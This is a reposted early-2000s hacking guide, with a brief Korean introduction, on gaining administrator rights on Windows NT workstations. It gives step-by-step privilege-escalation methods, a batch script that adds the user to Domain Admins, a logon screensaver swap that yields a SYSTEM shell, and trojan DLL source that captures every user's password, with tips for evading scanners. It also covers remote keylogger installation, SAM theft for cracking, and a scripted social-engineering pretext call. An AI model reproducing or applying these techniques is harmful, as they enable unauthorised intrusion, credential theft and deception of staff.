영문이라 읽기 힘드신분들 계시겠지만.. 내용은 읽어줄만 합니다
책에서도 나온 내용들도 꽤 있구요..시스템관리자 대상으로 상당히 좋은 글이 될수 있겠습니다.
PURPOSE
This guide is written for the average Hacker, Cracker and SystemAdministrator. I writ this guide so Administrators (And Hackers) have agood understanding of the security on a Windows NT Box. This guide wasnot written for Good nor Evil, it was written purely for people todeveloped there knowledge further on a Windows NT Box, so as I said ifyou abuse this knowledge and end up going to court don't bring my nameinto it, I told you how to do it but I never said do it...
If you are more interested in actually Hacking into a NT boxremotely then you will have to wait until the guide entitled "TheUltimate Hackers Handbook to Hacking Windows NT" comes out. I hope youlearn something from reading this text file even if you are aLinux\Unix fan. I know there are properly spelling mistakes and bad useof grammar in this guide but I don't really care providing it'sreadable who really does care?
NOTE: THE BOX YOU ARE PENERTRATING IS A WINODWS NT WORKSTATION 4.0BUT THIS REALLY DOESN'T MATTER, IT ALL DEPENDS ON HOW UPDATED THEREPATCHES ARE (YOU WILL SEE WHAT I MEAN WHEN YOU READ ON)
Starting Point
So what would make an excellent penetration attempt? Getting yourhands on a copy of the SAM (Security Account Manager) and then runningthe latest version of L0phtCrack against it. So firstly you would lookin the WINNT\REPAIR and if there is a copy of SAM, copy it to aformatted floppy disk and leg it out the building, then when you gethome load it into your home version of L0phtcrack feed in a bunch ofwordlists and dictionary files, turn on the TV watch an episode ofBuffy The Vampire Slayer and once that is finished check L0phtCrack andyou would have uncovered about 60 odd passwords including the Admins!Hurray mission accomplished, easy, hey?
But what if a copy of the SAM isn't there? Well it looks like yourgoing to have to get Admin privileges and this is what the guide ishere for...
EXPLOIT 1 - GETADMIN.EXE
Ok now before I explain to you what "GetAdmin" actually is, I thinkI better just tell you that this exploit was programmed\writ in 1997the time of writing this the year is 2003 so if this exploit actuallyworks on your system you should really look for updates because youneed service, anyway on with the exploit.
A very clever person called Konstantin Sobolev wrote the program;so all credits go to him. Since this is his program it's best that heexplains how it works...
"This program can get administrator rights without any specialprivileges. Simply run GetAdmin or GetAdmin account_name from thecommand line. If you do not enter account_name current account will beused.
The bug is in the subfunction of NtAddAtom, which does not check anoutput address. So it's possible to write into kernel memory. Of courseit's not necessary to inject DLL into winlogon to get admin rights. Youcan simply replace some part of ntoskernel or replace process token andetc. If you'd like to get the full source code, please click here.
Preventing the Attack
Only one real way: patch ntoskernel and replace function NtAddAtom so it checks for valid address.
You can remove all access from ntoskernel but it's possible to takeinto account in the fixed address of the NtGlobalFlag in the GetAdminprogram. So another ways to get administrator rights exists if you canwrite to the kernel memory."
Now if you didn't really take any of that in here is STEP-BY-STEPguide to executing the program... NOTE IT DOESN'T WORK ON ALL VERSIONSOF NT!
STEP 1
The file is a Zip format so unzip it with a unzipping utility called WinZip...
STEP 2
Extract the files to any directory, which you have read and write access.
STEP 3
Locate the directory to where you unzipped the files and check that you have the following files...
GetAdmin.exe - The file you will be executing
GASYS.DLL - The file, which injects itself into GetAdmin.exe
STEP 4
Load up Cmd.exe (The DOS B0x)
STEP 5
Change to the directory where the two files are located
STEP 6
Execute the GetAdmin.exe by typing Getadmin.exe Account_Name
E.g. If I was logged in as Michelle Trachtenberg I would type...
GetAdmin.exe Michelle Trachtenberg
You should then get a message, which says something like"Congratulations, Michelle Trachtenberg has Admin rights!" If thishappens log out then login as Michelle Trachtenberg (Or whateveraccount you were in) if this doesn't happen go to step 7
STEP 7
Wait....
The screen will freeze for a while and perhaps may even crash! Soreboot the machine and log in as Michelle Trachtenberg (Or whateveryour account name is)
STEP 8
Bingo! You should have Admin rights! You can do anything you want!I advise you Download L0PhtCrack and some wordlists and launch themagainst the remote machine. Then hide the Application and get on withsome work!
An Hour later you should have recovered about 30 - 50 passwords(All depends on how strong the passwords are and where you downloadedthe Dictionary Files from.
Now for all you really clever people and top notch programmers here is some of the source code to the program GetAdmin.exe....
How it works?
Here is the main string that has done all in GetAdmin:
ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); After that you can openany process in the system, because function NtOpenProcess does notchecks for a SE_DEBUG_PRIVILEGE when bit in NtGlobalFlag+2 is set.Aftermore, program injects DLL in the winlogon process. Winlogon isrunning under the SYSTEM account so it can add / remove user in theAdministrators group.
Function ChangeNtGlobalFlag:
BOOL ChangeNtGlobalFlag (DWORD NtGlobalFlag)
{
DWORD callnumber = 0x3; //NtAddAtom
DWORD stack [32];
int i;
DWORD handle=0;
CHAR string[255];
If (! pNtGlobalFlag) return 0;
Stack [0] = (DWORD) string;
Stack [1] = (DWORD)&handle; //pNtGlobalFlag;
For (i=0;i ‹ 0x100;i++)
{
sprintf(string,"NT now cracking... pass %d", i);
If (handle & 0xf00){
Stack [1] = (DWORD) pNtGlobalFlag+1;
}
__Asm {
mov eax, callnumber;
mov edx, stack;
lea edx,dword ptr [stack];
int 0x2e;
}
if( stack[1] == pNtGlobalFlag+1) break;
}
Return TRUE;
}
That's actually pretty complex, but if you understand all the sourcecode fair play! But you should all have a rough understanding on how toexecute the GetAdmin.exe, and you should have a good understanding ofhow it works.
If you are an Admin and this Exploit worked then go to
www.Mic*ft.com and look for a GetAdminFix.exe or go to a search engine and type in "Download patch for GetAdmin.exe"
If the Exploit didn't work you either...
Have a patch for it already (Well done)
The GetAdmin exploit isn't compatible with your version of windows.
Ok on with the next Exploit...
--------------------------------------------------------------------------------
HACKERS TIP: IF THE EXPLOIT DIDN'T WORK TRY DOWNLOADING A PROGRAMCALLED CRASH.EXE, RUN THIS PROGRAM FIRST THEN RUN GETADMIN, YOU SHOULDBE THEN ADDED TO THE ADMIN GROUP....
--------------------------------------------------------------------------------
EXPLOIT 2 - SECHOLE.EXE
Ok again, this one is fairly old but it came out after getadmin.exeso if getadmin.exe didn't work for you this one should. Ok thissechole.exe is basically another admin attack and this is how it works,this was taken from the readme file of the sechole.zip...
Another GetAdmin attack -- Lets any user become admin user instantly!!
Attached are the README file, executable and the DLL which demonstrate The NT Security hole.
Steps to follow: You need to have a machine running Windows NT 4.0 or 5.0beta, either workstation or server will do.
Login as any non-admin user on the machine (even guest account willdo). (You may verify that the logged in user does not possess adminprivilege At this time by trying to run the "windisk" program from theshell. This should fail since the user does not have admin privilege).
Copy the attached files: SECHOLE.EXE and ADMINDLL.DLL onto your harddisk In any directory, while logged in as the above non-admin user.
Run SECHOLE.EXE. After this your system might become unstable or evenHang. The damage is already done by this time. Simply reboot themachine. You will see that the non-admin user now belongs to theadministrator Group. This means that the user has complete admincontrol over that Machine. Now you will be able to run programs like"windisk". Another Way to verify newly acquired admin privileges is torun the "User Manager" from the "Administrative Tools".
In my opinion this bug is very difficult to fix. I plan to write Aboutit in our upcoming book "Undocumented Windows NT" which is yet to bePublished and talks about a host of undocumented calls that Mic*ftUses. Something every serious programmer must have.
Right, there is nothing really else to say about that exploit, itsquite simple to understand and execute, so I'll let you work the restout.
--------------------------------------------------------------------------------
EXPLOIT 3 - BATCH HACKING
One day I was just messing about with the BATCH language and Ifound an exploit that could actually help you get Admin access. Nowwhen you see this exploit you may think "That's pretty old and wasdiscovered ages ago" BUT I writ this in the space of 10 minutes and itworked like a charm First I will give you the actual source code for the BATCH script thenI will write out simple steps on how to use it.... To pull of this Hacksimply log in as guest.
COPY HERE
--------------------------------------------------------------------------------
echo off
Net user %user% pass /active /domain /add
Net local group Administrators %user% /add
Net group "Domain Admins" %user% /add /domain
Net group "Guests" %user% /delete /domain
--------------------------------------------------------------------------------
STEP-BY-STEP GUIDE TO USING THE "HACKING BATCH SCRIPT"
STEP 1
Open up notepad
STEP 2
Copy and paste the above script into the notepad
STEP 3
Then "Save As” then saves as XXXXX.BAT (XXXXX being the name ofwhatever you want to call it) And save it to the followingdirectory....
WINNT\Profiles\All users\Start Menu\Programs\Start-up Folder
Bingo! At the next Administration Login, the user would gain privileged access to the system and the domain.
NOTE: IF YOU ADMIN IS A PRO THEN HE\SHE WOULD HAVE DISABLED CERTAINNET COMMANDS AND MAY EVEN BLOCK ACCESS TO THE STARTUP FOLDER! BUT THISSCRIPT IS WORTH A SHOT :)
--------------------------------------------------------------------------------
EXPLOIT 4 - REPLACING LOGON
I was browsing the underground and I came across a simple text filewritten by well I didn't get his name he didn't leave it but if he isreading this now email me and I can give you the proper credit youdeserve, ok? The text file I discovered gives a rather simple way ofgetting ADMIN! Priviliges here is how you do it.
If you can log in as an account, drop to DOS start -> run ->cmd, at the C: prompt type the following (assuming default installlocations)
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr
Now log off the machine, logon.scr is the screen saver that will kickin after 15 minutes of not touching the keyboard/mouse at the logonscreen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rightswill pop up, then just to C:\> net user administrator And then login with the new account.
Try this, might work, and as long as he\she didn't change defaultpermissions on C:\winnt and C:\winnt\system32 you should be golden.
Heh, there you have it another, very easy way to get Admin! BUTremember once you have changed the password to the administratorsaccount make sure you sort out the screen saver mess and change it backto how it was, or otherwise it's going to happen to you! Yeah, I knowit's a vicious circle!
--------------------------------------------------------------------------------
HACKERS TIP: IF YOU DON'T WANNA RISK LOGIN IN AS ADMIN AND CHANGINGTHE PASSWORD, WELL SINCE YOU HAVE A DOS BOX WITH FULL SYSTEM RIGHTS,SIMPLY RUN THE "RDISK" COMMAND AND CREATE A EMERGENTCY DISK TO THE A:\,THE EMERGENCY DISK WILL CONTAIN ALL THE IMPORTANT FILES WINDOWS NTNEEDS TO LOAD, INCLUDING THE SAM! BUT THERE IS A CATCH THE SAM WILLONLY HAVE ADMIN AND GUEST! SOMETIMES IT ONLY HAS GUEST SO BECAREFUL :(
--------------------------------------------------------------------------------
EXPLOIT 5 - KEY LOGGING
I was actually wondering if I should include this Hacker techniqueand NT exploit because it is a tad lame! And I don't really know if itfits in as getting Admin, but anyway I suppose I better explain howthis one works... You all know what a key logger is right? , Well it'sa piece of software which gets stored on the victims computer and logsall keystrokes to a "Hidden" file and sometimes it's password protectedso only the person who installed the key logger canview\add\edit\uninstall the key logger. There are two main types of Keyloggers there are Hardware Key loggers and Software Key loggers.
HARDWARE KEYLOGGERS - A hardware key logger is a piece of equipmentwhich gets plugged into the back of the PC and then gets linked up withanother PC, And what ever gets typed on the first PC it shows up on theother PC, it's kind of obvious when you think about it. Here is anotherexample of a Hardware Key logger; Imagine a normal keyboard the usualtype the one which you plug in the back of your PC. Well, there are"Special" keyboards, which look identical to a normal keyboard but onlyit, Logs ALL keys that are pressed and stores them in a file, which theattacker or concerned parents specify. Some hardware key loggers comewith software and other ones don't, well this file isn't about keyloggers so just look around yourself, and be careful you could be beinglogged right now... :)
SOFTWARE KEYLOGGERS - Yeah you guessed it, a software key logger isa form of a program. Which as I said above gets installed secretly onthe PC and then all keys are logged to a hidden file and the file ispassword protected so if you discover it and try to delete it you willbe prompted with a password box. To be honest it is actually quitescary because Key loggers are now pretty advance and contain advancefeatures such as...
LOG all Yahoo! MSN, AIM conversations.
LOG all screenshots
LOG all websites visited
LOG all applications ran
LOG all passwords.
And what is even more scary is that some key loggers contain"Remote logging” which means that an attacker can bind the key loggerwith another exe file(s) and sent it via email all keys are then sentto the attacks PC over email.
Well I went to
www.google.com andwas looking very quickly at Windows NT loggers and let me tell youthere are loads! So browse around and see what you can find, however Ido recommend looking for one called "Blazing Tools Perfect Key logger"since it has allot of advance features and can be installed remotelywhich means that you can combined the key logger with an exe file (As Ihave mentioned above) and when the victim runs the exe file the keylogger is stealthily installed! On there PC (You send it via email)Then all the key log information goes to your email account in the formof *.log files. This is pretty cool, you can also set the key logger toboot up at the very start up therefore you can catch network passwordsincluding the Admins!!!
Anyway as I said it is a bit lame and it's not guaranteed to work 100% But I'm sure if you send one to the
Admin@company.com,you could come across quite allot of interesting things such as MSNpasswords, Yahoo account information etc BUT this is script kiddiebehaviour! BUT then again it could get the job done pretty quickly...
Anyway to finish this section I'll tell you about "Blazing Tools Perfect Key logger" features...
Can be absolutely invisible
Visual surveillance (screenshots)
Logging texts typed in every application
Websites logging
Clipboard logging
Sending log and screenshots by e-mail in the hidden mode
Stealth uploading logs by FTP
Remote installation
Log file is encrypted and can be protected with a password
Monitoring all users of the PC, even if you don't know their passwords
Easy log viewing and management
Export log to HTML format
Possibility to specify target applications
Supports all Windows versions, including Windows XP
Very easy to use
Low price
If you manage to get Admin you may want to take the key logger onestep further by Stealing everyone else is password you can do this inthe following steps...
Install and configure key logger on the administrator's PC
Copy key logger’s folder contents (by default - Program Files\BPK) to any folder on the remote computer.
Click Start > Run and type regedt32
Choose File > Connect to computer command (this command can be written different in the different versions of Windows)
Connect to the PC you have chose and open HKEY_LOCAL_MACHINE\Software\Mic*ft\Windows\CurrentVersion\Run registry branch
Add REG_SZ entry with any name and value = full path to bpk.exe (key logger’s executable)
On the next Windows start-up key logger will start its work
Ok for all you Network security experts and 1337 (Elites) shoutingat the screen now "LAME exploit! Can easily be avoided" then lets justignore the Key Logger and move on...
--------------------------------------------------------------------------------
EXPLOIT 6 - RDISK
Ok, I'm going to be honest this worked once for me and that’s it! So don't be surprised if this doesn't work at all.
Anyway we all know the DOS command "RDISK" basically if you readthe Hackers tip above your realise that when you run this command itproduces a Emergency boot disk, now let me explain that on this diskall the important main start-up files are copied including the SAM.However the only accounts on there will be Guest and Administrators(Possibly).... So follow these steps... to pull of this hack...........
STEP 1
Login as anyone who has access to the cmd.exe
STEP 2
Run the DOS B0x and then type the command "RDISK" (make sure you are in the Winnt directory.)
STEP 3
Pop in a floppy disk when it tells you (You will get a warning that the floppy disk will be formatted simply go ok)
STEP 4
Sit back and relax and let it copy all the main files to the disk.
STEP 5
Nick the disk! And when you get home import the SAM file from thedisk and run L0phtcrack against it... AND HOPEFULLY THE ADMIN ACCOUNTWILL BE ON THERE BUT NO! PROMISES!
NOTE TO ADMINS: YOU CAN AVOID THIS BY DISABLING THE RDISK COMMAND
--------------------------------------------------------------------------------
EXPLOIT 7 - MY FRIEND PETER
THIS EXPLOIT WAS TAKEN FROM "The Unofficial NT Hack FAQ"
And this is pretty Advance so if you are new to Windows NTsecurity\Hacking I would give this Exploit a miss and come back to itlater...
Use the Offline NT Password Editor by Petter Nordahl-Hagen. You need toDownload Petter's code to your Linux machine (you DO have one of those,Don’t you?) And compile it using a libDES and MD4 library. Now mountthe NT drive read/write and follow the instructions in the readme. TheInstructions are pretty easy to follow, especially if you know enoughto get To the point to use them ;-)
Actually, to make things easier, Petter has built a bootdisk imagethat Step you through the entire thing. I'll be the first to admit thatPetter's Code is as dangerous as hell, but it does work and I had noproblems. YMMV.
Consider using GetAdmin.exe (section 04-5) and go from there if youare too Paranoid or fearful of booting up Linux to get to an NT machine
--------------------------------------------------------------------------------
EXPLOIT 8 - %SYSTEMROOT%\SYSTEM32 BEING WRITABLE
Again, This exploit was taken from the "The Unofficial NT Hack FAQ"by Simple Nomad, and I found this exploit quite successful when tryingto steal network passwords, the only downside to this is that good AV(Anti-Virus) will pick this exploit up quite quickly if you don'tcompile it very well, But never the less you might as well have ashot...
Well, this can be exploited on NT 4.0 by placing a trojanedFPNWCLNT.DLL In that directory. This file typically exists in a Netwareenvironment. First compile this exploit code written by Jeremy Allison(jra@cygnus.com) And call the resulting file FPNWCLNT.DLL. Now wait forthe user names and Passwords to get written to a file in \temp.
------------- Cut --------------
#Include
#include
#include
struct UNI_STRING {
USHORT len;
USHORT maxlen;
WCHAR *buff;
};
static HANDLE fh;
BOOLEAN __stdcall InitializeChangeNotify ()
{
DWORD wrote;
fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
return TRUE;
}
LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,
struct UNI_STRING *passwd)
{
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;
memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
sprintf(buf, "RID = %x\n", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
return 0L;
}
------------- cut --------------
If you load this on a Primary Domain Controller, you'll getEVERYBODY'S password. You have to reboot the server after placing thetrojan in %systenroot%\system32.
ISS (www.iss.net) has a security scanner for NT which will detectthe Trojan DLL, so you may wish to consider adding in extra junk to theabove code to make the size of the compiled DLL matches what theoriginal was. This will prevent the current shipping version of ISS'sNT scanner from picking up the Trojan.
It should be noted that by default the group everyone has defaultpermissions of "Change" in %systemroot\system32, so any DLL that is notin use by the system could be replaced with a Trojan DLL that doessomething else.
--------------------------------------------------------------------------------
EXPLOIT 9 - ACCESS CONTROL LIST AB(USE) BY ME!
In every Windows NT box there are files, directories and an ACL(Access Control List) . Each user and group has a SID (SecurityIdentifier), and when a user attempts to read or write to a file theaccess is checked against a list of access-control entries inside theACl. So the Guest account for example wont is allowed to do as mainthings as the Administrator (Obviously) because of the ACL. Here is alist of the flags controlling ACL for files and directories....
FLAG DESCRIPTION
------ -------------
N No access
R Read
W Write
X Execute
D Delete
P Change permission
O Ownership
An All
RX Directory File/Scan
WX Directory
So how does this bit of Knowledge help you get Admin? well, thinkabout it you are limited to do a certain number of things because ofyour ACL and SID so if you could perhaps edited your SID your ACL willbe altered, confused? well don't worry cause I will take you throughthe steps of the methods that have worked for me (Note: I am writingthis from personal experience so don't blame me if whatever I say itturns out totally different!)
To pull of this Hack I suggest you get the following tool(s) (Ifyou don't have access to them already) These are the tools I used to"unset my flags" and to modify the access control entries inside theACL.
GRANT
REVOKE
SETOWNER - This is the tool I use the most because it gets the job done nicely :)
Once you have downloaded these tools, note the directory to whereyou have saved them. Now open up a DOS B0x and change to the directoryof where they are located. I suggest you first run SETOWNER.EXE (If youcan work this one you can mainly work all of them) ok now once this isdone your get something like........
Setowner 1.1 something, something copyright Arne Vidstorm. Sostraight away you can see that there aren't that many options so thisprogram is quite simple to use, just remember one key thing.......
Setowner [Domain\Account]
So lets do some examples, say for instance we wanted to find out who owned the file Diary.txt we would simply type.........
Setowner PATH OF FILE! e.g. C:\files\file.txt
and then you would get something like.........
The File owner is: OWNER OF FILE E.G
The File owner is: Michelle Trachtenberg
Pretty simple huh? Basically all we have done is selected a fileand found out who owns it. Now lets move on to more actual Hacking(Well, sort of)
Say for instance that one of the "Employees" (Including theAdministrator) has a file that you want and you know the Hardcore patha simple command with the Setowner can easily make you 0wn the file thecommand is this...
Setowner HARDCORE PATH OWNER e.g.
Setowner C:\Files\Diary.txt Michelle Trachtenberg
What would happen is that Michelle Trachtenberg would be the 0wnerof "C:\Files\Diary.txt" , understand? It's really simple her theSetowner program even includes examples so you should have to troubleusing it.
So there you have it another way to...
Ok, ok this little exploit may not get you Admin but it can takeadvantage of the whole "ACL" so basically you can own files, whichdon't actually belong to you! So if the Admin was really stupid!! theywould place a copy of the SAM (The one which they made from the RDISK)into another directory (Don't ask me why? I said if they were stupid)and that’s where you will pick it up with your new toy :)
So basically use Setowner or Revoke etc to poke around and 0wnother Employee's files and if you are really lame you can go up tothere face and say...........
"y0 1'm a Hax0r and 1 jUsT 0wned ur Phile!" HAHAHHAHAHAH
Well anyway that’s if you are lame....... Let's move on..........
--------------------------------------------------------------------------------
EXPLOIT 10 -SNIFFING
I will make this section short since Sniffers are very advance andI would have to write a whole guide on the subject. I will get straightto the point, as you know a Sniffer is used to monitor network trafficand debug bad CGI code or look for some form of bug in a server ornetwork. However they can also be used to catch 100's of networkpasswords. How?
Well if you think about it a sniffer is recording and logging allthe traffic which passes through the network and that means whensomeone logs on to the network there user and pass would be logged astraffic. So if you arrived early at work and installed a sniffer andconfigured in correctly all you have to do is wait and watch thepackets of data get logged into the sniffer and bingo! you could end uphaving half of the network passwords even the Administrators! BUT it'snot that easy because Sniffers aren't really that easy to set-up andinstall and some networks are configured totally different to thesniffer, so the sniffer could end up sniffing just boring old trafficand isn't logging the traffic from the correct network adapter. Also,the fact is that you need to examine the logged data bits carefullybecause you wont get some like this...
User: Michelle Trachtenberg
Password: Hackerzrock
You’re either get something like this.........
$%TFR&&HB124T**User:MichelleTrachtenberg*&*(PLH&Y
^^&&^^&&^T^TBBUUJNIUMJPass:Hackerzrule*((OI()I(I
*U*U*HHH ^T^&T^&^&^JU*I(*UU&*Y&Y&Y&TT^^&^&&^^^&^&^T^&
GET\cgijhyunHNYBYHYYHYHYHYHYHB^^&*&*&*(8788772817828127
Or if the sniffer is programmed to dump the logs in a Hex format it will look something like this......
00 0 00 0 0 00 0 0 02332 0 030303 0 .............................
098 77 66 55 4 3 3 2 4 3 34 4 5 4 3 3 .............................
(You would then need to convert this to Text)
In conclusion sniffers are very powerful and dangerous and ifconfigured and set-up correctly, the Hacker could be rolling inpasswords and personal email messages.
If you plan to actually get Administration privileges using a sniffermy advice is to read as many text files on Sniffers as possible, learnhow the network is set-up then download a bunch of Sniffers andexperiment with them and see which one suits you, there are millions ofSniffers out there and its up to you to decide which one suits you.It's best to get a freeware one, which has a nice GUI and has manyfeatures as well as being highly configurable. Well that’s all there isto say on Sniffers and remember your only capable of hacking the systemif you know how the system works.............
--------------------------------------------------------------------------------
EXPLOIT 11 - SOCIAL ENGINEERING
As the final exploit to this guide I am going to end up talkingabout Social Engineering. What is social engineering? well the nice wayto put it is pretending to be someone your not but the real way isbasically bullshitting!
You have to pretend to be someone your not, remember that. For exampleI'm sure you have all heard of the legend Kevin Mitnick (The SuperHacker some might say) now don't get me wrong because Mitnick was oneof the best hackers and was very clever BUT he was known as the"Master" of Social Engineering so he spent allot of his time getting toknow people and tricking them to give out secret information such asPasswords and weakness’ in the system he wished to Hack.
I've mentioned Kevin just in case you kiddies out there start thinking"Hahah that will never work, no one is that dumb!" all I can say tothat is "LOOK AT KEVIN MITNICK".........
Ok now for some social engineering examples.......
*NOTE: REMEMBER THESE NEVER REALLY HAPPENED BUT THESE WORK.......
H = Hacker
MT = Michelle Trachtenberg (The receptionist at
www.victim.com)
Picture the scene you are calling from a pay box and Michelle Trachtenberg is at her reception desk and it is Monday morning.
Hacker has done his homework so he knows a bit of info about the company.
Hacker dials number.........
RING , RING........... RING...... MT: Good morning, welcome to Victim, how may I help you?
H: Oh hello, I'm the Computer Technician and I was called late lastnight by your manager and he asked me if I could take a look at yourWindows NT workstations, he says your having trouble.........
MT: Ok can I have your name please?
H: Yes my name is Mike Jones
MT: And what company do you work for?
H: I work for the company XYZ Inc....
MT: What was the name of the manager who contacted you?
H: I don't mean to be rude lady, but I have allot of work to dotoday and I would gratefully appreciate it, if you would please put methrough to your Administrator.
MT: Ok, ok I'm sorry but I need to ask these questions for security reasons, you must understand that?
H: Yes, I do but I'm sure you have allot of work to do and don'treally want to cause any trouble for Me or your company so please wouldyou put me through to your Administrator.
MT: Ok. Please hold....
Michelle puts the call on hold and calls up the Administrator......
ADMIN: hello
MT: Oh hi Tom, A Mike Jones would like to talk to you.
ADMIN: Mike Jones?
MT: Yeah he says he is a Computer Technician and was phoned late last night because down at the offices you are having trouble.
ADMIN: Mmmm I don't recall any trouble but lately the Email servershave been playing up so maybe that is why he was called, put himthrough Michelle.
MT: Ok
Michelle puts Hacker through..........
ADMIN: Hello?
H: Hello I'm the computer Technician and was called late last night because you are having trouble with your workstations.
ADMIN: Oh hello, I wasn't actually expecting anyone since that wehaven’t really had any trouble lately... But you can never be too safe,Heh ok what can I do for you?
H: Could you please create me an account and add me to the localadministrator group. If I'm going to take a look at your Workstationsit's best I can view them inside out.
ADMIN: Sure, your user will be "Mike.J" and your Password will be...... "PcRePAIR".
H: Ok thanks
ADMIN: Give me 10 minutes to set up your account and once you aredone phone Michelle so you can talk to me and let me no what's wrong Iwill then remove your account, ok? Have a nice day
H: Heh, Sure will and yes I feel that this is going to be a very Good day...
HANGS UP PHONE AND NOW 0wns the network!
There you have it and that is how easy it is to get Admin access bySocial Engineering. Let's just go over a few basic skills....
Sound professional don't use slang
If the Receptionist challenges you, use a firmer tone and complain about your heavy workday.
Have a name and company ready and even a member of staff of Victim.com
If you are Fucking up badly! Hang up and run!
Always use a Payphone you don't want to risk being traced.
Be confident, don't hesitate
--------------------------------------------------------------------------------
FINAL WORDS
So there you have it, 11 ways to get Admin privileges on a WindowsNT box (Well sort of Admin) when you have physical access to themachine. Personally I can't see these exploits working on places likethe NAVY, AMRY, NSA etc But these exploits could help you get admin onplaces like High School, Universities etc And to all the fellowAdministrators out there I warn you now if you fall out or give aemployee(s) are hard time you could end up regretting it and be lookingat a massive pay loss. My advice to prevent this is pretty simple "Havea good relationship with your fellow employees" . New exploits forWindows NT are discovered all the time so make sure you update yoursystems with the latest patches and hot fixes and you should be ok. Ithink you should try all these exploits (Well, the ones you can) onyour system and see which ones get you Admin access, therefore you knowwhich patches to update.
Thanks for reading, and I hope you learnt something from reading this.If you are having trouble finding these exploits just wait a couple ofmoths and before you know it I will be releasing a "Exploit Pack" forwindows NT, it will contain all the Exploits you have read in theguide. Well take care and have fun (Or Phun as the Hax0rs would say)
